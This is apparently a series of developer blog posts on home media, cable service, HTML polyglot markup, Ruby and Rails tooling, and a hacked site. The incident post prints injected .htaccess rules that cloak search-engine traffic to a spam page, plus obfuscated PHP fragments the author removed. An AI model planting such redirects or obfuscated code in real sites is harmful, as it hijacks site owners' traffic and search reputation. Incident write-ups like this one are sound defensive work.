Scott Hanselman: Plex is the media center software ecosystem I’ve been waiting for

Unhappy with Time Warner Cable, I’ve been exploring netflix, dish, sling, roku, samsung, ffmpeg, handbrake, and cclive.  Next up, some form of video capture device... at the moment I’m leaning towards Hauppauge.

I’m not quite prepared to declare Plex as the centerpiece of my home media center, but it certainly has become a key component.

Unlike Scott, I didn’t go with a dedicated NAS box.  Installation of a Plex Media Server on Ubuntu is a snap (though a workaround is needed if you happen to make use of an apt cacher).

Obligatory Cable Guy reference.

Mike Amundsen: I have the even greater privilege of working with Leonard and Sam on a new book - “RESTful Web APIs”. It’s scheduled for completion by the end of Q1 2013 and should be available soon after.

While I’m formally on this project, I’m not planning on doing any writing beyond possibly an introduction.  As Mike put it, this book isn’t merely a 2nd edition, but rather more of a “follow-up” seven years on.  I’m very much looking forward to seeing where Mike can help Leonard take this work.

Google has reported feedvalidator.org as being hacked, and people are tweeting and emailing me.

I’ve looked at the markup being returned and it looks clean to me.  The .htaccess file looks fine.  A git status command shows that none of the files on the server have been modified.

Can somebody identify what is causing Google to be concerned?

Peter Linss: I really want to see the TAG be more involved with the rest of the working groups at the W3C

I’ll come out and say it.  I’m a skeptic.  Each of the nominees are good people.

I’ll note that the three out of the four of the “TAG reformists” statements do NOT list getting involved with the rest of the working groups at the W3C as a goal: Alex Russell, Marcos Cáceres, Anne van Kesteren, and Yehuda Katz.

And outside of Anne, none of them have significantly been involved in the HTML WG.  As to Anne, I don’t see being on the TAG as resolving his concern.

What am I missing?

It started with two notifications we received via postal mail.  First Time Warner was going to start charging us rent for an outdated cable modem.  Second they were going to drop a number of cable channels, but if I acted now, I could request a digital adapter which would allow me to watch these channels on exactly one TV.

So I did some research and purchased a DOCSIS 3.0 compatible modem that can do IP V6, figuring that would future proof me for a while, and connected it up.  I actually managed to get an IP address assigned, but everything I tried after that was redirected to a site saying that I needed to be “provisioned” and to call a number.  Upon calling that number, I got connected with a person whose sole purpose seemed to be to upsell me to a higher plan.  After I politely but firmly refused, I was transferred and placed on hold for about 30 minutes.  The woman that tried to help me get connected couldn’t get it to work so she transferred me to level 3.  Another 5 minutes later, a gentleman picked up and also had trouble.  It took him about 30 minutes to get it to work — apparently they didn’t give him instructions on how to deal with DOCSIS 3.0 modems despite my picking one of the options on the list they provided to me.  But he was pleasant and apologetic throughout, and eventually did manage to get it working.

The next day I drove 15 minutes to stand in a 20 minute line to do what amounted to a 60 second transaction: here’s a box, here’s a receipt.  Thank you and goodbye.

As to the dropped channels... I dutifully filled out an online form requesting a digital adapter, and got first a confirmation and subsequently a notification that the order was “complete”... where the latter merely indicated that something would be shipping in 3-5 business days, giving me a confirmation number.  That was 18 November.

The box never showed up.

Yesterday, the channels went dark, and I went online.  After using Chrome to override my User Agent so that I could make use of their chat system, I waited over 20 minutes for a representative.  After checking, he said that there was nothing he could do for me, and gave me a number I could call.  I called that number and was told that the wait time would be more than 30 minutes.  As the chat window was still open, I asked if there was anything else I could do.  He said call back late in the evening when the wait times would be less.  I was not happy and closed the chat window.  I was then presented with a survey, in which I responded that the person was not able to solve my problem and that I was not happy.

I tweeted to TWCableHelp and got no response a DM five hours later asking me for my phone number.  Before I went to bed, I sent an email.  When I woke up I got a response indicating that the email had been forwarded to “our regional contacts”, who would be contacting me.  They have not.

I called again, and was told that there would be a 20 to 25 minute wait time.  It was closer to 30.  I was told that another digital adapter had been placed on order.  I asked for a confirmation number, and was told that she didn’t have one.  I asked for an email, and she said that one would be sent within 48 hours.  I was given a case number.  And that was all she could do for me.

At this point, I have nobody I can contact, no tracking number, and no confidence that this time will turn out any different.  And a number of black channels.

This process has turned a fairly complacent Time Warner customer into one that is actively seeking alternatives.  In looking around, I see plenty of promo offers of more service than I have (basic cable and basic internet) for considerably less than I am currently paying.  I am OK with waiting an hour or more for an answer, but I am not OK with having to be on hold for that entire time.  And I’m definitely not OK with renting a separate box per device simply to get access.

So I am beginning my research: starting with looking for alternatives to cable TV.  What I want is a single plan that allows me to watch whatever I want wherever I want.  I am OK with upgrading my devices as long as we are talking about a purchase not a lease.

Any pointers people might leave in comments would be appreciated.

I see that Henri Sivonen is once again being snarky without backing his position.  I’ll state my position, namely that something like the polyglot specification needs to exist, and why I believe that to be the case.

The short version is that I have developed a library that I believe to be polyglot compatible, and by that I mean that if there are differences between what this library does and what polyglot specifies that one or both should be corrected to bring them into compliance.

I didn’t write this library simply because I am loonie, but very much to solve a real problem.

The problem is that HTML source files exist that contain artifacts like consecutive <td> elements; people process such documents using tools such as anolis; and such libraries often depend on — for good reasons — libraries such as libxml2 which do an imperfect job of parsing HTML correctly.  The output produced by such tools when combined with such libraries are incorrect.

Note that I stop well short of recommending that others serve their content as application/xhtml+xml.  Or that tools should halt and catch fire if they are presented with incorrect input.  In fact, I would even be willing to say that in general people SHOULD NOT do either of these things.

Now that I have provided instance proofs of the problem and the solution, I’ll proceed with the longer answer.  I will start by noting that Postel’s law has two halves, and while the HTML WG has focused heavily on the second half of that law, the story should not stop there.

To get HTML right involves a number of details that people often get wrong.  Details such as encoding and escaping.  Details that have consequences such as XSS vulnerabilities when the scenario involves integrating content from untrusted sources.  Scenarios which include comments on blogs or feed aggregators.  Scenarios that lead people to write sanitizers and employ the use of imperfect HTML parsers.

It is well and good that Henri maintains — on a best effort basis only — a superior parser for exactly one programming language.  Advertising this library more won’t solve the problem for people who code in languages such as C#, Perl, PHP, Python, or Ruby.  Fundamentally, a tools will save us response is not an adequate response when the problem is imperfect tools.

This problem that needs to be addressed is very much the flip side, and complement to, the parsing problem that HTML5 has competently solved.  Given a handful of browser vendors and an uncountable number of imperfect documents, it very much make sense for the browser vendors to get together and agree on how to handle error recovery.  By the very same token, it makes sense for authors who may produce a handful of pages to be processed by an uncountable number of imperfect tools to agree on restrictions that may go well beyond the minimal logical consequences from normative text elsewhere if those restrictions increase the odds of the document produced being correctly processed.

Yes, it would be great if this weren’t necessary and all tools were perfect.  Similarly, it would be great if browser vendors didn’t have to agree on error recovery as this makes the creation of streaming parsers more difficult.  The point is that while both would be great, neither will happen, at least not any time soon.

These restrictions may indeed go beyond “always explicitly close all elements” and “always quote all attribute values”.  It may include such statements as “always use UTF-8”.

Such restrictions are not a bad thing.  In fact, such restrictions are very much a good thing.

Doug Sheppers: WebPlatform.org will have accurate, up-to-date, comprehensive references and tutorials for every part of client-side development and design, with quirks and bugs revealed and explained. It will have in-depth indicators of browser support and interoperability, with links to tests for specific features. It will feature discussions and script libraries for cutting-edge features at various states of implementation or standardization, with the opportunity to give feedback into the process before the features are locked down. It will have features to let you experiment with and share code snippets, examples, and solutions. It will have an API to access the structured information for easy reuse. It will have resources for teachers to help them train their students with critical skills. It will have information you just can’t get anywhere else, and it will have it all in one place.

But it doesn’t. Not yet.

Robin Berjon: Looking at it in terms of rebounds, plot twists, nurtured healing and abandonment, love and betrayal, strife, toil, stunning victories, dispersions and last minute rallies the only thing that distinguishes HTML’s history from a charts-topping teenage fantasy saga seems to be the lack of vampires. And even then, were vampires around I’m not sure we’d notice them for all the action.

Bill McCoy: EPUB in effect takes the Wild, Wild Web and tames it. EPUB for example requires use of the XML serialization of HTML5 (XHTML5), rather than “Tag Soup” aka “Street” HTML. This means that EPUB content, unlike arbitrary web pages, can be reliably created and manipulated with XML tool chains. EPUB defined Reading System conformance more tightly than HTML5 defines for browser User Agents, pinning down things that are under-specified in the union of W3C standards. [via Patrick Mueller]

The interface is a bit low level, but workable:

require 'dbus' # gem install ruby-dbus
bus = DBus::SessionBus.instance
sm = bus.service('org.gnome.SessionManager').object('/org/gnome/SessionManager')
sm.introspect
sm.default_iface = 'org.gnome.SessionManager'
cookie = sm.Inhibit($0, 0, 'inhibiting', 4).first
at_exit { cookie = sm.Uninhibit(cookie) if sm.IsInhibited(4).first }

Note: the call to Uninhibit is optional — it will occur on process exit anyway.

Hat tip to JanuZ.

Jacques Distler: Remarkably, even after a decade of such pain, Unicode is, in 2012, still “cutting edge.”

Ouch.

I previously had installed Ubuntu 12.04 on a NetBook, and my overall impression was simply that it was more stable than its predecessor — particularly for Unity.

For the first time I tried it on a desktop, and to my surprise the following worked:

sudo apt-get install ruby1.9.3

And by worked, I mean not only did it install Ruby 1.9.3, but it made it (and gem, and irc) the default ruby.

For those that still use rvm, (many of the ‘cool kids’ have moved on to rbenv, I noticed a few niggles:

• Don’t follow the instructions and specify --ruby or --rails. You will get a version of Ruby that can’t install gems. Simply omit that parameter.
• Next set the ‘Run command as login shell’ checkbox.
• Then run rvm requirements and install what it tells you to install.
• Finally, run rvm install 1.9.3 to build the latest.

Personally, I follow that up with rvm --default system.  That means that while I have other Rubies available at my finger-tips, the one I generally use is the one provided with Ubuntu.

Firefox 13 for developers: Support for -moz-border-radius*  and -moz-box-shadow has been removed. Authors should use unprefixed border-radius or box-shadow instead. See bug 693510

+1

Dan Webb: The first thing that you might notice is that permalink URLs are now simpler: they no longer use the hashbang (#!). While hashbang-style URLs have a handful of limitations, our primary reason for this change is to improve initial page-load performance.

chat implements a shared textarea field across multiple clients.  Demonstrates bi-directional communication.

diskusage is more typical of my usage.  The du command produces tabular output that the user may want to sort different ways and yet is may take considerable time to complete.

Usage: add wunderbar and nokogiri to your Gemfile and run bundle install.  Template extensions supported are _html and _json.  Examples: view, layout, json.

Note that as Rails layouts and views are predicated on the assumption that output is produced by concatenating text, one must use _ yield instead of simply yield.  I have noticed that this may lose blank lines in the process, which apparently is a known issue with Nokogiri.  Not a problem if the layout is erb, but then you lose the unified indentation that you get if you have a layout using _html.

On the plus side, Wunderbar will note when the first argument to a call which creates an element is html_safe? and will treat it as markup.  An example of where this is useful would be in the _td link_to calls below.

_h1_ 'Listing products'

_table do
  _tr do
    _th 'Title'
    _th
    _th
    _th
  end

  @products.each do |product|
    _tr_ do
      _td product.title
      _td link_to 'Show', product
      _td link_to 'Edit', edit_product_path(product)
      _td link_to 'Destroy', product, confirm: 'Are you sure?', method: :delete 
    end
  end
end

_br_

_ link_to 'New Product', new_product_path

Demo

The result is a lot like Markaby, except you get to be/have to be explicit when you are creating a tag.  In this demo, there is no logic, so the benefits of doing so are less clear, but include you being able to use tags that aren’t known to Markaby, like the ones that were added in HTML5.  Both inline and views are supported, but support for layouts has yet to be added.

While the demos require Ruby 1.9.2+ (the Hash syntax is nicer), the library works equally well with Ruby 1.8.7.

The progression is that you start from scripts that you can run from the command line:

ruby helloworld.rb

...can pass arguments to:

ruby helloword.rb name=Sam

...can run as a standalone server:

ruby helloworld.rb --port=3004

...can install as a CGI:

ruby helloworld.rb --install="/Library/WebServer/Documents/helloworld.cgi"

.,. and can now run under Sinatra.  Future plans include Rails.

There even is a tool that will reverse engineer an existing web page into a script.

This site was hacked.  A reader of the site noted that Google’s index of this site had been co-opted by dubious pharmaceutical offerings.  I’ll gladly thank that individual publicly if they give me permission to do so; but my email reply got bounced as spam.

The immediate culprit was the addition of the following lines to a number of .htaccess files:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteRule ^.*$    /common.php [L]
</IfModule>

I removed those lines, as well as the common.php file, and scanned any and all php files on my site.  I saw the addition of lines such as the following:

$FYAqxDo='p'.'r'. 'eg_repl'. 'ace';...
$IHxWfs=str_rot13('cert_ercynpr');...
$DcNZVHCi="eW6DLAlbeAki"^"...
$LYDmvYopCKSSSGcfCVNpsskU='ba'.'se64_'.'deco'.'de'...

I had old (vintage 2006) installations of PHP-openid-1.2.1 and PHP-yadis-1.0.2 that I am tentatively assuming were the ports of initial entry.

I also wiped my .ssh directory.  It has a private key there that was generated for this site that presumably was legitimate, but unused by me and now presumed compromised.  I never initiate sessions from this host, nor do I have any passwords saved there, so any damage caused was isolated.

I do daily backups of my site, which I keep for a week; as well as monthly backups that I basically keep forever.  In addition, as I recently migrated hosts, I have a hot backup.

The PHP hacks were done after I migrated but before March 1st.  The htaccess hacks were done over a week ago, but after March 1st.

Over the next few days, I’ll be looking at diffs of different snapshots of my site contents to see if there is anything else I missed.

I’ve integrated jbuilder like functionality into Wunderbar.  Key differences?  A DSL that doesn’t suck, and output that isn’t ugly.

To harsh?  You be the judge.  Compare jbuilder ("json dot bar json bar json dot child bang") vs Wunderbar ("underbar underbar underbar underbar").

As to the output?  Don’t be fooled by the jbuilder readme.  In actuality is no unnecessary whitespace in the output.  That’s good if you are bandwidth limited.  Not so good when viewing the XHR traffic via firebug...

It is increasingly becoming the case that Agile Web Development with Rails is being actively co-developed with Rails itself.

While my tests have been an official part of the release process for a long time now, yesterday’s release of 3.2.3RC1 provides a number of examples that illustrate this.

Within hours after the release, I got an excited IM from Santiago Pastorino that my tests were failing.  In particular, the failure was thus:

rake db:migrate
rake aborted!
An error has occurred, this and all later migrations canceled:
uninitialized constant Arel::Relation
Tasks: TOP => db:migrate
(See full trace by running task with --trace)

The root cause was quickly determined to be a recent change to arel, and a number of corrective actions were promptly taken: first, the change was backed out, then Rails 4.0 was updated and Rails 3.2 was changed to point to a branch of arel, and finally, the original change was reapplied.

The previous error that was caught was connection pool of new applications have size 1.  This demonstrates the unique value that my tests bring to the table.  Outside of my tests, the bulk of the test of Rails is an impressive array of unit tests (which verify that the connection pool setting does what it is supposed to do), and real world testing (using applications with highly tuned configurations), and my tests.  Only the latter is effectively testing that the defaults provided actually work together to provide a viable configuration to use as a starter set for new applications.

One last example, this one shows the level cooperation involved.  The underlying security changes that were the raison d'être for the 3.2.3 release caused the following scenario to fail:

rails generate scaffold Product title:string
rake db:migrate
rake test

The root cause was that the code generated as scaffolding used the very feature which is now being discouraged as it creates a security issue. The fix required both changes to Rails itself (to change the scaffolding generated) and to the scenario provided in the book (both in identifying the code that needs to be changed, and in the changes that need to be made).

The intent is to prove an updated to the eBook free of charge which incorporates the necessary changes, either concurrent with the final release of 3.2.3 or shortly thereafter.